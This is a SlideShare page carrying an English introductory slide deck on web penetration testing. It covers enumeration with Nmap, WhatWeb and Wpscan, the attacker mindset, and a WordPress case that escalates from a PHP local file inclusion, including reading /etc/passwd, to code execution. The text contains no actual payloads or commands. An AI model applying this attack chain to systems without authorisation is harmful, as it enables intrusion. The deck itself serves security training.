O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.
Introduction to Penetration
Testing
Table of Contents
• Overview
• Enumeration
• Tool Output
• Do We Stop Here?
• Custom Scripts
• Wpscan
• Online Research
• ...
Overview
• This session will cover the mindset I follow
when approaching a web application
• I am going to show where many...
Overview Cont.
• Tools Leveraged:
– Nmap
– Whatweb
– Wpscan
– Wget
– Custom scripts
– Burp Suite
– Netcat
– Google
Methodology Overview
• Pre-Engagement Activities
– Hammer out all the details to conduct the test (Schedule,
Scoping, Rule...
Methodologies Cont.
• Penetration Testing Execution Standard
(PTES):
– http://www.pentest-
standard.org/index.php/Main_Page
Mindset is Key
• Think like an attacker and see things through a
different lens:
– Upload an avatar? Hmmm add code?
– Down...
Enumeration
• Nmap:
• WhatWeb:
Do We Stop Here?
• Hmmm?
Custom Scripts
• Web Application testing requires custom
scripting….really no way getting around it:
Custom Scripts Cont.
• Making web requests with a scripting language
isn’t too difficult
• Check out tutorials online and ...
Wpscan
• Wpscan:
Wpscan
• Do we stop here?
Wpscan : Plugin Enumeration
• Wpscan: --enumerate p
Online Research
Online Research Cont.
• Hmm, our web server doesn’t respond when
we request “/wordpress/wp/wp-content/”
• Do we stop here?
Testing Exploitation
• Yea, lets grap “/etc/passwd”
PHP LFI
• Cool, so we can LFI, do we stop now?
PHP LFI…Now What?
• What can be done with a PHP LFI?
• It depends on what function is leading to the LFI
vulnerability (in...
Code Execution? Yes, Please!
Code Execution? Yes, Please!
• Request:
Demo
Summary
• Tools may not give you the answer
• Very easy to hit a hurdle and quit
• You need to be curious/creative and
con...
Próximos SlideShares
Carregando em…5
×

Introduction to Penetration Testing

Introduction to Penetration Testing with a use case of LFI -> Shell. I talk about the mindset required to be a good tester, and show places many testers and automated tools stop and how to go further.

  • Entre para ver os comentários

Introduction to Penetration Testing

  1. 1. Introduction to Penetration Testing
  2. 2. Table of Contents • Overview • Enumeration • Tool Output • Do We Stop Here? • Custom Scripts • Wpscan • Online Research • Testing Exploitation • PHP LFI • Code Execution, Yes Please!
  3. 3. Overview • This session will cover the mindset I follow when approaching a web application • I am going to show where many might stop, and what happens when you push further • These types of techniques can be applied to any web application
  4. 4. Overview Cont. • Tools Leveraged: – Nmap – Whatweb – Wpscan – Wget – Custom scripts – Burp Suite – Netcat – Google
  5. 5. Methodology Overview • Pre-Engagement Activities – Hammer out all the details to conduct the test (Schedule, Scoping, Rules of Engagement, Formal Permission, etc.) • Information Gathering and Reconnaissance – Depends on type of test and information you are given (Organization name, CIDR, list of URLs, source code, etc.) • Automated Testing • Manual Testing and Validation • Reporting • Remediation Support
  6. 6. Methodologies Cont. • Penetration Testing Execution Standard (PTES): – http://www.pentest- standard.org/index.php/Main_Page
  7. 7. Mindset is Key • Think like an attacker and see things through a different lens: – Upload an avatar? Hmmm add code? – Download a report? Hmm directory traversal for another file? • Confidence – Without it you’ll very easily hit a wall and stop – I tell myself a vulnerability is here I just need to find it
  8. 8. Enumeration • Nmap: • WhatWeb:
  9. 9. Do We Stop Here? • Hmmm?
  10. 10. Custom Scripts • Web Application testing requires custom scripting….really no way getting around it:
  11. 11. Custom Scripts Cont. • Making web requests with a scripting language isn’t too difficult • Check out tutorials online and try to automate web requests • Making a tool for CVE-2012-1823 is a good use case because you need to make a POST request and modify several header values – If you can write a tool for this CVE, it demonstrates concepts that can be applied to many different CVEs
  12. 12. Wpscan • Wpscan:
  13. 13. Wpscan • Do we stop here?
  14. 14. Wpscan : Plugin Enumeration • Wpscan: --enumerate p
  15. 15. Online Research
  16. 16. Online Research Cont. • Hmm, our web server doesn’t respond when we request “/wordpress/wp/wp-content/” • Do we stop here?
  17. 17. Testing Exploitation • Yea, lets grap “/etc/passwd”
  18. 18. PHP LFI • Cool, so we can LFI, do we stop now?
  19. 19. PHP LFI…Now What? • What can be done with a PHP LFI? • It depends on what function is leading to the LFI vulnerability (include(), readfile(), etc.) • PHP functions like include() will execute PHP code in the included file – Yay code execution through php snippets! • PHP functions like readfile() will only display output – We have more work to do 
  20. 20. Code Execution? Yes, Please!
  21. 21. Code Execution? Yes, Please! • Request:
  22. 22. Demo
  23. 23. Summary • Tools may not give you the answer • Very easy to hit a hurdle and quit • You need to be curious/creative and constantly push to get more information • Confidence and mindset goes a long way

×